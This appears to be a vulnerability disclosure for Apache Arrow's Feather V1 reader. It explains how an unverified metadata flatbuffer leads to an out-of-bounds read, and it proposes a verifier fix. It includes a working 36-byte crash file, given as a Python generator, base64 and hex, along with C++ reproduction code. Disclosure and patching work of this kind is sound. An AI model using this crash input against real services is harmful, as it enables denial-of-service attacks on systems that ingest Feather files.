Summary
Opening a crafted Feather V1 file through the public
arrow::ipc::feather::Reader::Open API triggers an AddressSanitizer
heap-buffer-overflow (out-of-bounds read) inside Arrow's legacy Feather V1
metadata parsing. The reader calls fbs::GetCTable on the trailing metadata
flatbuffer without first running a flatbuffers::Verifier, then
dereferences attacker-controlled offsets in ReaderV1::ReadSchema
(cpp/src/arrow/ipc/feather.cc:178) before any Status error can be returned.
A 36-byte file with the FEA1 magic and a corrupt footer triggers the crash
deterministically, so any service that ingests untrusted Feather V1 files can be
crashed (denial of service).
Tested at pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT).
Root Cause
ReaderV1::Open reads the trailing metadata flatbuffer and obtains a typed view
of it via fbs::GetCTable(...). A flatbuffer obtained this way is untrusted:
its vtable, field offsets, and vector lengths are attacker-controlled bytes. The
flatbuffers contract requires a caller to run a flatbuffers::Verifier over the
buffer before touching any generated accessor; only verification guarantees that
every offset stays inside the buffer.
ReaderV1::Open skips that step. It goes straight from GetCTable to
ReadSchema(), which dereferences metadata_->columns() on the unverified
table. columns() is a flatbuffers GetPointer that reads the vtable and an
offset field; with a corrupt offset, flatbuffers::ReadScalar reads past the end
of the metadata buffer.
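The lookup described above can be sketched in a few lines of Python. This is an illustrative model only, not Arrow or flatbuffers code: `OutOfBounds`, `read_scalar`, and `field_position` are hypothetical names, and the field index 2 used for `columns` is an assumption about the field order in the Feather schema. The sketch follows the standard flatbuffers table layout (root offset, signed offset back to the vtable, 16-bit field slots) and adds the bounds check that the unverified C++ accessor path does not perform.

```python
import struct


class OutOfBounds(Exception):
    """Raised where an unchecked C++ accessor would read past the buffer."""


def read_scalar(buf: bytes, pos: int, fmt: str) -> int:
    """Bounds-checked stand-in for flatbuffers::ReadScalar (little-endian)."""
    size = struct.calcsize(fmt)
    if pos < 0 or pos + size > len(buf):
        raise OutOfBounds(f"{size}-byte read at offset {pos}, buffer has {len(buf)} bytes")
    return struct.unpack_from(fmt, buf, pos)[0]


def field_position(buf: bytes, field_index: int):
    """Return the absolute position of a table field, or None if it is absent."""
    table = read_scalar(buf, 0, "<I")               # root uoffset, relative to buffer start
    vtable = table - read_scalar(buf, table, "<i")  # soffset stored at the table start
    vtable_size = read_scalar(buf, vtable, "<H")
    slot = 4 + 2 * field_index                      # skip vtable size and table size
    if slot >= vtable_size:
        return None                                 # field not present in this vtable
    rel = read_scalar(buf, vtable + slot, "<H")
    return table + rel if rel else None


# A hand-built 20-byte buffer: root offset, vtable (one field), padding, table, value.
valid = (struct.pack("<I", 12) + struct.pack("<HHH", 6, 8, 4) + b"\x00\x00"
         + struct.pack("<i", 8) + struct.pack("<I", 0xABCD))
print(field_position(valid, 0))

# An empty region (as in the PoC) and a corrupt root offset are both rejected.
for bad in (b"", struct.pack("<I", 0xFFFFFFFF) + valid[4:]):
    try:
        field_position(bad, 2)  # index 2 for columns is an assumption
    except OutOfBounds as exc:
        print("rejected:", exc)
```

Every read in the walk depends on bytes taken from the buffer itself, which is why a single up-front verification pass is needed before any accessor runs.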
Vulnerable code (cpp/src/arrow/ipc/feather.cc:172):
    metadata_ = fbs::GetCTable(metadata_buffer_->data());  // no flatbuffers::Verifier
    return ReadSchema();
  }

  Status ReadSchema() {
    std::vector<std::shared_ptr<Field>> fields;
    for (int i = 0; i < static_cast<int>(metadata_->columns()->size()); ++i) {  // line 178: deref unverified flatbuffer
      const fbs::Column* col = metadata_->columns()->Get(i);
      std::shared_ptr<DataType> type;
      RETURN_NOT_OK(
          GetDataType(col->values(), col->metadata_type(), col->metadata(), &type));
      fields.push_back(::arrow::field(col->name()->str(), type));
    }
Call chain (attacker bytes -> fault):
arrow::ipc::feather::Reader::Open                               feather.cc:773 / :794 (public API)
  -> ReaderV1::Open                                             feather.cc:173
       metadata_ = fbs::GetCTable(...)                          feather.cc:172  <- NO flatbuffers::Verifier
  -> ReaderV1::ReadSchema                                       feather.cc:178
       metadata_->columns()->size() -> fbs::CTable::columns()   feather_generated.h:698
  -> flatbuffers::Table::GetVTable
  -> flatbuffers::ReadScalar                                    base.h:440  <- OOB read
The metadata buffer is sized to the file's declared metadata_length; the
corrupt offset points past that region, so the accessor reads out of bounds.
Arrow's own threat model (docs/source/cpp/security.rst, "Ingesting untrusted
data") states the IPC reader APIs must return an arrow::Status error on
malformed input. The V1 reader violates that contract: it crashes before it can
return a Status.
PoC
A 36-byte malformed Feather V1 file: the FEA1 magic header, 24 bytes of 0xFF
filler, a metadata_length of 0, and the trailing FEA1 magic. Reader::Open selects
the legacy V1 path on the FEA1 magic; GetCTable then builds a table over the
empty metadata region and columns() reads out of bounds.
# generate_poc.py: re-create the shipped 36-byte crash input
poc = (
    b"FEA1"                # leading magic
    + b"\xff" * 24         # corrupt footer body
    + b"\x00\x00\x00\x00"  # metadata_length = 0
    + b"FEA1"              # trailing magic
)
assert len(poc) == 36
with open("poc.bin", "wb") as f:
    f.write(poc)
Crash input size: 36 bytes (poc/poc.bin, md5 9d96bcc065b6672396fed18492792d03).
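To make the layout concrete, the sketch below computes which byte range the footer declares as metadata. It is a hedged illustration rather than Arrow's parsing code: `metadata_region` is a hypothetical helper, and the 8-byte footer (a 4-byte little-endian metadata_length followed by the 4-byte trailing magic) is an assumption inferred from the `size - footer_size - metadata_length` expression in the reader.

```python
import struct

MAGIC = b"FEA1"
FOOTER_SIZE = 8  # assumed: 4-byte little-endian metadata_length + 4-byte trailing magic


def metadata_region(data: bytes):
    """Return (offset, length) of the metadata region declared by the footer."""
    if len(data) < len(MAGIC) + FOOTER_SIZE:
        raise ValueError("file too small to be Feather V1")
    if data[:4] != MAGIC or data[-4:] != MAGIC:
        raise ValueError("missing FEA1 magic")
    (length,) = struct.unpack_from("<I", data, len(data) - FOOTER_SIZE)
    offset = len(data) - FOOTER_SIZE - length
    if offset < len(MAGIC):
        raise ValueError("metadata_length exceeds file size")
    return offset, length


poc = b"FEA1" + b"\xff" * 24 + b"\x00\x00\x00\x00" + b"FEA1"
print(metadata_region(poc))  # (28, 0)
```

Under these assumptions the declared region starts at offset 28 and is zero bytes long, so any read through the flatbuffer accessors falls outside it.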
Reproduction
Build Arrow C++ from source with -DARROW_IPC=ON and AddressSanitizer, then open the attached Feather
V1 file through the public reader API:
#include <arrow/ipc/feather.h>
#include <arrow/io/memory.h>
// auto buf = ...read poc.bin...;
auto source = std::make_shared<arrow::io::BufferReader>(buf);
std::shared_ptr<arrow::ipc::feather::Reader> reader;
auto st = arrow::ipc::feather::Reader::Open(source).Value(&reader); // OOB read here
ReaderV1::Open does metadata_ = fbs::GetCTable(metadata_buffer_->data()) with no
flatbuffers::Verifier over the metadata, then ReadSchema() dereferences metadata_->columns() on
the unverified flatbuffer:
AddressSanitizer: heap-buffer-overflow READ
#0 flatbuffers::ReadScalar<...> base.h
#1 arrow::ipc::feather::fbs::CTable::columns() feather_generated.h
#2 ReaderV1::ReadSchema / ReaderV1::Open ipc/feather.cc
The unverified GetCTable + columns() deref is still present in current master (cpp/src/arrow/ipc/feather.cc:172).
PoC: 36-byte .feather file (recreate from the base64 below).
Suggested Fix
Run a flatbuffers::Verifier over the metadata buffer before calling
fbs::GetCTable or dereferencing any accessor, and return Status::Invalid on
failure, matching how the V2/IPC reader rejects malformed metadata:
     ARROW_ASSIGN_OR_RAISE(metadata_buffer_,
                           source->ReadAt(size - footer_size - metadata_length,
                                          metadata_length, /*allow_short_read=*/false));
-    metadata_ = fbs::GetCTable(metadata_buffer_->data());
+    flatbuffers::Verifier verifier(metadata_buffer_->data(),
+                                   metadata_buffer_->size());
+    if (!fbs::VerifyCTableBuffer(verifier)) {
+      return Status::Invalid("Feather V1 metadata failed flatbuffer verification");
+    }
+    metadata_ = fbs::GetCTable(metadata_buffer_->data());
     return ReadSchema();
(The exact verifier symbol depends on the generated feather_generated.h; the
principle is "verify before accessing", and the precise call is the upstream
maintainer's judgement.)
PoC bytes (self-contained)
The trigger input is 36 bytes (poc/poc.bin).
Recreate it exactly with:
base64 -d > poc.bin <<'B64'
RkVBMf///////////////////////////////wAAAABGRUEx
B64
Hex: 46454131ffffffffffffffffffffffffffffffffffffffffffffffff0000000046454131
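As a cross-check, the hex dump can be decoded and re-encoded to confirm that it, the base64 text, and the listed digest all describe the same 36 bytes. The snippet below is a small convenience sketch using only the Python standard library; the hex string is written with a repeat count for readability and is meant to equal the dump above.

```python
import base64
import hashlib

# Same bytes as the hex dump: magic, 24 x 0xff, metadata_length = 0, magic.
hex_dump = "46454131" + "ff" * 24 + "00000000" + "46454131"
poc = bytes.fromhex(hex_dump)

b64 = base64.b64encode(poc).decode("ascii")
print(len(poc), b64)                  # compare with the base64 text above
print(hashlib.md5(poc).hexdigest())   # compare with the md5 listed for poc/poc.bin
```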
Credit
Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).